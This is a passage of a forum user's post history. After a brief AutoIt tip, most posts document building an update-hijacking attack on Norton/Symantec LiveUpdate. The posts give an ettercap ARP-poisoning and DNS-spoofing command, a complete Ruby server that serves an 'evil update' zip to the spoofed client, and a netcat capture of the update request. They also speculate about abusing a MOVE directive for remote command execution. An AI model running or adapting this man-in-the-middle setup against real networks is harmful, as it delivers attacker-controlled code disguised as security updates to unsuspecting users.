
i8igmac

Dedicated Members
  • Posts: 939
  • Days Won: 22

Posts posted by i8igmac

  1. This could be a fun first-timer's project. You should check out the scripting language AutoIt.

    if (window exists "instant messenger" with text("power on") then execute("net system power on")

    The syntax here is improper, but this can be done with only a few lines of code in AutoIt.

    You should install AutoIt and check out the WinZip tutorial.

    I'm sure you will have lots of fun.

  2. Here is a quick update on what I have done so far... I was going to make a video but I see no need... The client successfully downloads the modified zip file from my computer during the DNS spoof (screenshot of Wireshark). I just need to modify the zip package's contents to trigger execution...

    sudo ettercap -T -F filter.ef -P dns_spoof -M arp // //

    First thing: the ettercap filter drops encryption for more plaintext (not sure if it's needed for this situation, but I like to use it).
    dns_spoof: [liveupdate.symantecliveupdate.com] spoofed to [192.168.1.104]

    sudo ruby exploit.rb

    (It's something I put together in a few minutes, don't judge me ,-P)

    require 'socket'            # SERVER: answers for the spoofed liveupdate hostname

    ZIP_PATH = '/home/bigmac/out.zip'   # new evil update
    FLG_BODY = ''.b  # body for minitri.flg; the original sent "Content-Length: 1" with no body, put the real flag bytes here

    # Read one request (request line + headers) up to the blank line.
    # A fixed read(100) blocks on short requests and splits long ones.
    def read_request(client)
      lines = []
      while (line = client.gets)
        lines << line
        break if line.strip.empty?
      end
      lines.join
    end

    # HTTP wants CRLF line endings and a blank line before the body
    # (the original sent "\n\r\n\r", which leaves a stray "\r" in front of the body).
    def http_response(headers, body)
      headers.lines.map(&:chomp).join("\r\n") + "\r\n\r\n" + body
    end

    server = TCPServer.open(80)
    loop do
      client = server.accept
      begin
        print read_request(client) # should receive GET /minitri.flg
        client.write(http_response(<<~HDR, FLG_BODY))
          HTTP/1.1 200 OK
          Content-Length: #{FLG_BODY.bytesize}
          Content-Type: text/plain
          Last-Modified: Fri, 29 Jul 2005 20:24:32 GMT
          ETag: "1-42ea9080"
          Accept-Ranges: bytes
          Date: Sun, 15 May 2011 01:52:21 GMT
          Connection: keep-alive
          Cache-Control: public,must-revalidate,max-age=1800
        HDR

        print read_request(client) # should receive the GET for the Symantec update zip from the client

        # now send payload; Content-Length tells the client where the zip ends
        zip = File.binread(ZIP_PATH)
        client.write(http_response(<<~HDR, zip))
          HTTP/1.1 200 OK
          Content-Type: application/zip
          Content-Length: #{zip.bytesize}
          Last-Modified: Sun, 15 May 2011 21:16:04 GMT
          ETag: W/"15a1-4dd04294"
          Accept-Ranges: bytes
          Date: Sun, 15 May 2011 20:50:18 GMT
          Connection: close
          Cache-Control: public,must-revalidate,max-age=240
        HDR
      rescue => e
        warn "#{e.class}: #{e.message}"
      ensure
        client.close # disconnect from the client so the next accept gets a fresh socket
      end
    end
    
    

    Wireshark screenshot of the zip file downloaded, 192.168.1.102 <---> 192.168.1.104:

    img838.imageshack.us/i/screenshotwireshark.png

    ... I should post the zip file; I'm sure all that is needed is changing a few numbers around to trigger execution.

  3. ettercap, filter to drop encryption for more plaintext... I fixed my problem with extracting the file ,-)

    Instead of pasting into a text editor I just nc:

    netcat xxx.xxx.xx 80 > out.zip
    GET /streaming/norton$202009$20streaming$20virus$20definitions_1.0_symalllanguages_livetri.zip HTTP/1.1
    If-Modified-Since: Sun, 08 May 2011 03:51:51 GMT
    Cache-control: max-age=0
    Cache-Control: no-cache
    Cache-Control: max-stale=0
    Cache-Control: min-fresh=1000
    Accept: */*
    HOST: liveupdate.symantecliveupdate.com
    User-Agent: +V2Ga/n+ZIRfedhlw5VItU2dHhkjA/GTQAAAAALUE
    Connection: Keep-Alive

    I opened out.zip in a text editor, removed the response header from the top of the file, and the file extracts just fine ,-)

    I would really like to share more in depth because this looks promising...

    One of the files' contents looks like this, one line:

    MOVE([TempDir],%StreamDefDir%)

    I think this could give me sort of remote command execution.

    A quick test would be 'ping 192.168.1.101' (my laptop IP).

    I found this log someone posted and it now gives me a better view of what's going on... hxxp://community.norton.com/norton/attachments/norton/nis_feedback/92741/1/log.lu2.txt

  4. Maybe I could get someone's opinion. I have captured a GET request like /get symtec/id/dir/update.zip

    I can reproduce this GET request with Ruby sockets and receive the binary data of the zip file. I saved this data and tried to extract its contents, but it fails.

    I hope to write my own evilgrade-style exploit. Right now I'm on my Droid; I will post this GET request and the binary data tonight. Any thoughts on how to properly handle this zip file? Please share.
